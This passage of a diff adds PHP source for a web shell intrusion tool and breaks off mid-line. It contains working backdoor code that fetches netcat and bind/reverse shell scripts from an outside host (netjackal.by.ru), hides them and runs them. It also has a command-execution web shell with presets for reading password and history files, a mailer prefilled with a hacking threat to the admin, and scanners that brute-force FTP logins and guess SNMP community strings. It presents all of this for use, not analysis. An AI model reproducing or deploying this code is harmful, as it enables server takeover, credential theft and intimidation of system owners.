+$res=substr(fgets($sock,512),0,3); +if($res!='235')return 0; +return 1; +} +function checksmtP($host,$timeout){ +$from=strtolower(namE())."@".strtolower(namE()).".com"; +$sock=@fsockopen($host,25,$n,$s,$timeout); +if(!$sock)return -1; +$res=substr(fgets($sock,512),0,3); +if($res!='220')return 0; +fputs($sock,'HELO '.namE()."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"MAIL FROM: <$from>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"DATA\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='354')return 0; +fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +return 1; +} +function check_urL($url,$method,$search,$timeout){ +if(empty($search))$search='200'; +$u=parse_url($url); +$method=strtoupper($method); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$data=(!empty($u['query']))?$u['query']:''; +if(!empty($data))$data="?$data"; +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +fputs($sock,"$method $file$data HTTP/1.0\r\n"); +fputs($sock,"Host: $host\r\n"); +if($method=='GET')fputs($sock,"\r\n"); +elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); +else return 0; +if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} +while(!feof($sock)){ +$res=trim(fgets($sock)); +if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} +} +fclose($sock); +} +return 0; +} +function get_sw_namE($host,$timeout){ +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +$page=namE().namE(); +fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); +while(!feof($sock)){ +$con=fgets($sock); +if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} +} +fclose($sock); +return -1; +}return 0; +} +function snmpchecK($ip,$com,$timeout){ +$res=0; +$n=chr(0x00); +$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). +$com. chr(0xA0). +chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. +chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). +chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). +chr(0x01). chr(0x01). $n. chr(0x05). $n; +$sock=@fsockopen("udp://$ip",161); +socket_set_timeout($sock,$timeout); +@fputs($sock,$packet); +socket_set_timeout($sock,$timeout); +$res=fgets($sock); +fclose($sock); +return $res; +} + +$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF'; +if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");} +$disablefunctions = @ini_get('disable_functions'); +if (!function_exists("str_repeat")){ +function str_repeat($str,$c){ +$r=""; +for($i=0; $i < $cu; $i++)$r.=$str; +return $r; +} +} + +function brshelL(){ +global $errorbox, $windows,$et,$hcwd; +$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; +$addr='http://netjackal.by.ru/backdoor'; +$error="$errorbox Can not make backdoor file, go to writeable folder.$et"; +$n=namE(); +if(!$windows)$n=".$n"; +$d=whereistmP(); +$name=$d.DIRECTORY_SEPARATOR.$n; +$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl'; +$c=($_REQUEST['C'])?1:0; +if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){ +$port=(int)$_REQUEST['port']; +if($windows){ +if($c){ +$name.=".exe"; +$bd=downloadiT("$addr/nc.exe",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); +}else{ +$name = $name.".pl"; +$bd=downloadiT("$addr/winbind.pl",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("perl.exe $name $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/bind.c",$name); +if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); +}else{ +$bd=downloadiT("$addr/bind.pl",$name); +if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &"); +echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>"; +} +} +} +elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ +$ip=$_REQUEST['ip']; +$port=(int)$_REQUEST['rport']; +if($windows){ +if($c){ +$name.='.exe'; +$bd=downloadiT("$addr/nc.exe",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); +}else{ +$name = $name.".pl"; +$bd=downloadiT("$addr/winrc.pl",$name); +shelL("attrib +H $name"); +if (!$bd)echo $error; else shelL("perl.exe $name $ip $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/rc.c",$name); +if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); +}else{ +$bd=downloadiT("$addr/rc.pl",$name); +if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &"); +} +} +echo "<font color=blue>Done!</font>";} +else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}} +function showimagE($img){ +echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";} +function editoR($file){ +global $errorbox,$et,$hcwd; +if (is_file($file)){ +if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";} +if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";} +$data = file_get_contents($file); +echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">"; +echo htmlspecialchars($data); +echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; +} +else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; +} +echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>"; +} +function webshelL(){ +global $windows,$hcwd; +if($windows){ +$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>"; +} +else{ +$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>"; +if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>"; +if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>"; +} +echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">"; +if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']); +echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>"; +} +function maileR(){ +global $msgbox,$et,$hcwd; +$cwd= getcwd(); +if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ +$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; +if (!mail($to,$subject,$body,"From: $from"))break; +echo "$msgbox<b>Mail sent!</b><br>$et"; +} +echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et"; +} +function scanneR(){ +global $hcwd; +if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; +$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; +if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ +$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; +echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>"; +$start=time(); +for($i=$from;$i<=$to;$i++){ +if($tcp){ +if (checkthisporT($target,$i,$timeout)){ +$nu++; +$ser=""; +if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; +echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>"; +} +} +if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";} +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)</font>"; +} +elseif (!empty($_REQUEST['securityscanner'])){ +echo "<font color=blue>"; +$start=time(); +$from=$_REQUEST['from']; +$to=(int)$_REQUEST['to']; +$timeout=(int)$_REQUEST['timeout']; +$f = substr($from,strrpos($from,".")+1); +$from = substr($from,0,strrpos($from,".")); +if(!empty($_REQUEST['httpscanner'])){ +echo "Loading webserver bug list..."; +flusheR(); +$buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); +$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); +if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>"; +flusheR(); +}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";} +for($i=$f;$i<=$to;$i++){ +$output=0; +$ip="$from.$i"; +if(!empty($_REQUEST['nslookup'])){ +$hn=gethostbyaddr($ip); +if($hn!=$ip)echo "$ip [$hn]<br>";} +flusheR(); +if(!empty($_REQUEST['ipscanner'])){ +$port=$_REQUEST['port']; +if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; +$open=$ser=""; +foreach($p as $po){ +$scan=checkthisporT($ip,$po,$timeout); +if ($scan){ +$ser=""; +if($ser=getservbyport($po,"tcp"))$ser="($ser)"; +$open.=" $po$ser "; +} +} +if($open){echo "$ip) Open ports:$open<br>";$output=1;} +flusheR(); +} +if(!empty($_REQUEST['httpbanner'])){ +$res=get_sw_namE($ip,$timeout); +if($res){ +echo "$ip) Webserver software: "; +if($res==-1)echo "Unknow"; +else echo $res; +echo "<br>"; +$output=1; +} +flusheR(); +} +if(!empty($_REQUEST['httpscanner'])){ +if(checkthisporT($ip,80,$timeout) && !empty($file)){ +$admin=array('/admin/','/adm/'); +$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); +$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); +$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); +foreach ($file as $v){ +$vuln=array(); +$v=trim($v); +if(!$v || $v{0}=='#')continue; +$v=str_replace('","','^',$v); +$v=str_replace('"','',$v); +$vuln=explode('^',$v); +$page=$cqich=$nukech=$adminch=$userch=$vuln[1]; +if(strstr($page,'@CGIDIRS')) +foreach($cgi as $cg){ +$cqich=str_replace('@CGIDIRS',$cg,$page); +$url="http://$ip$cqich"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@ADMINDIRS')) +foreach ($admin as $cg){ +$adminch=str_replace('@ADMINDIRS',$cg,$page); +$url="http://$ip$adminch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@USERS')) +foreach ($users as $cg){ +$userch=str_replace('@USERS',$cg,$page); +$url="http://$ip$userch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@NUKE')) +foreach ($nuke as $cg){ +$nukech=str_replace('@NUKE',$cg,$page); +$url="http://$ip$nukech"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +else{ +$url="http://$ip$page"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +} +} +} +if(!empty($_REQUEST['smtprelay'])){ +if(checkthisporT($ip,25,$timeout)){ +$res=''; +$res=checksmtP($ip,$timeout); +if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR(); +} +} +if(!empty($_REQUEST['snmpscanner'])){ +if(checkthisporT($ip,161,$timeout,1)){ +$com=$_REQUEST['com']; +$coms=$res=""; +if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; +foreach ($c as $v){ +$ret=snmpchecK($ip,$v,$timeout); +if($ret)$coms .=" $v "; +} +if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;} +flusheR(); +} +} +if(!empty($_REQUEST['ftpscanner'])){ +if(checkthisporT($ip,21,$timeout)){ +$usps=explode(',',$_REQUEST['userpass']); +foreach ($usps as $v){ +$user=substr($v,0,strpos($v,':')); +$pass=substr($v,strpos($v,':')+1); +if($pass=='[BLANK]')$pass=''; +$ftp=@ftp_connect($ip,21,$timeout); +if ($ftp){ +if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";} +} +flusheR(); +} +} +} +if($output)echo "<hr size=1 noshade>"; +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)</font>"; +if(!empty($buglist))unlink($buglist); +} +else{ +$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>"; +echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>"; +$host = substr($host,0,strrpos($host,".")); +echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>"; +} +} +function sysinfO(){ +global $windows,$disablefunctions,$safemode; +$cwd= getcwd(); +$mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program="; +$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; +if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"]; +$osver=$tsize=$fsize=''; +if ($windows){ +$osver = " (".shelL("ver").")"; +$sysroot = shelL("echo %systemroot%"); +if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"]; +if (empty($sysroot)) $sysroot = getenv("windir"); +if (empty($sysroot)) $sysroot = "Not Found"; +if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%"); +for ($i=66;$i<=90;$i++){ +$drive= chr($i).':\\'; +if (is_dir($drive)){ +$fsize+=@disk_free_space($drive); +$tsize+=@disk_total_space($drive); +} +} +}else{ +$fsize=disk_free_space('/'); +$tsize=disk_total_space('/'); +} +$disksize="Used spase: ". showsizE($tsize-$fsize) . " Free space: ". showsizE($fsize) . " Total space: ". showsizE($tsize); +if (empty($CPU)) $CPU = "Unknow"; +$os = php_unamE(); +$osn=php_unamE('s'); +if(!$windows){ +$ker = php_unamE('r'); +$o=($osn=="Linux")?"Linux+Kernel":$osn; +$os = str_replace($osn,"${mil}$o\">$osn</a>",$os); +$os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os); +$inpa=':'; +}else{ +$sam = $sysroot."\\system32\\config\\SAM"; +$inpa=';'; +$os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os); +} +$software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']); +echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>"; +if ($windows){ +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>"; +} +else +{ +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">"; +if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">"; +if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found"; +echo "</td></tr>"; +} +$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a 